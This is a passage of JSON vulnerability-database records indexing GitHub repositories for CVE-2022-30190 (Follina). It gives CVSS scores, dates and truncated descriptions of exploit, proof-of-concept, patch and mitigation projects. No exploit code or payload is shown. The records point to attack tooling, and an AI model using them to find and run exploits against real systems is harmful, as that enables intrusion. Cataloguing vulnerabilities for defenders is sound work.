"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-12T13:58:30", "id": "1840A140-1CD9-55F2-A8BD-9B7B27779956", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T05:49:57", "description": "# Compromised clickstudio certificate\n\n__Extracted from__: f3ccf...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-09T10:03:06", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-09T10:06:44", "id": "1E1DD2F1-F609-5686-A0EF-1C08ACABF537", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-02-01T05:35:40", "description": "# MS-MSDT-Office-RCE-Follina\nCVE-2022-30190 | MS-MSDT Follina On...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T16:09:02", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-02-01T03:12:52", "id": "FCCAAA4B-646B-578D-8CE2-5439E7799C32", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-20T17:40:56", "description": "# Follina-CVE-2022-30190-Sample-by-ethical-blue\n Educational Fol...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-25T16:27:59", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-20T16:04:27", "id": "37F78533-E96A-5433-B558-90DB82C0BB27", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-16T01:59:21", "description": "# follina-CVE-2022-30190\nfollina zer...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-15T22:49:21", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-16T00:04:19", "id": "6AF23F99-AE40-5899-AD81-AE3F71760F38", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-11T16:29:00", "description": "# Follina-CVE-2022-30190-Unofficial-patch-\nAn Unofficial Patch F...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-13T04:20:02", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-11T14:26:36", "id": "56417A88-33CB-520F-8FC3-4F3E49561DDC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-02-02T12:12:07", "description": "# FollinaExtractor\nExtract ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-15T02:22:53", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-02-02T09:37:21", "id": "675E960A-9F2E-5575-8C21-8528492BE5C6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-11-01T17:02:57", "description": "CVE-2022-30190\r\n\r\n# IMPORTANT\r\n\r\n## Patched as of:\r\nJune...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T16:14:13", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-11-01T16:41:09", "id": "2D9FF49E-AD93-5397-80B0-B02DED73DEA6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-31T05:34:20", "description": "# 'Follina' MS-MSDT n-day Microsoft Office RCE\u2014\u4fee\u6539\u7248\n\n\u6839\u636e https://g...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T12:33:18", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-31T03:27:00", "id": "0AD00567-1561-5CE2-8DA5-E64B286CBCAC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-11T16:29:03", "description": "# Follina-CVE-2022-30190-Unofficial-patch-\nAn Unofficial Patch F...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-13T04:20:02", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-11T14:26:36", "id": "5B74BEF9-0D39-5A60-8806-ABA55730878C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-11-15T20:18:26", "description": "# CVE-2022-30190\n\n[![N|Solid](https://socprime.com/wp-content/up...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-04T19:48:37", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-11-15T17:44:45", "id": "BC3F41CB-4333-5CCE-85A9-7064DAA6019A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-21T19:58:06", "description": "# **_\ud83e\ude79CVE-2022-30190 Temporary Fix\ud83e\ude79 (Source Code)_**\nThese are t...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-12T11:48:22", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-15T10:20:20", "id": "4881AA63-B127-594A-8F5B-ED68FD4BB9FF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-29T02:56:26", "description": "# folli...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-15T09:13:05", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-15T09:15:12", "id": "0E951B86-8BC4-54D9-BE2B-7B5DD988D1A0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-25T20:06:34", "description": "# go_follina\n\nFollina ([CVE-2022-30190](https...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-27T16:14:34", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-25T13:54:32", "id": "45B4D881-57D9-51C8-B5B9-9A6DA7413A36", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-20T17:21:16", "description": "# Follina-CVE-2022-30190-Sample-by-ethical-blue\n Educational Fol...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-25T16:27:59", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-20T16:04:27", "id": "FB757D3A-A896-5AB5-B72B-7C880581D12E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-10T10:59:21", "description": "# CVE-2022-30190\nMitigation for CVE-2022-30190\n\nScript requires ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-10T00:23:11", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-10T00:25:47", "id": "8FDF5020-8C7F-5695-ADD0-58100BD21FFF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-10T16:12:06", "description": "# Deathnote\n<p align=\"center\">\n \n<img src=\"https://media3.giphy....", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-08T10:58:23", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-10T15:39:45", "id": "70407390-C149-54F1-89B0-7611FB420601", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-11-09T23:43:05", "description": "```console\n$ gollina -h\n\n gollina\n Follina MS-MSDT 0-day MS Of...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T09:02:00", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-11-09T18:15:55", "id": "FC455648-370A-582B-A03A-6299DDC272F6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-28T02:26:42", "description": "**NOTE**: This tool is now **obsolete**! [The Follina exploit is...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T02:47:34", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-27T23:35:56", "id": "30F42F9A-5E27-592E-BE65-B85DC7E22075", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-27T20:31:47", "description": "# Follina-Remediation\nRemoves the ability for MSDT t...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T20:26:56", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-27T20:26:21", "id": "5DC52EE8-31C1-5E05-8AC1-8385C2002254", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-25T12:18:12", "description": "# follina (POC)\nAll about CVE-2022-30190, aka follina, that is a...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": 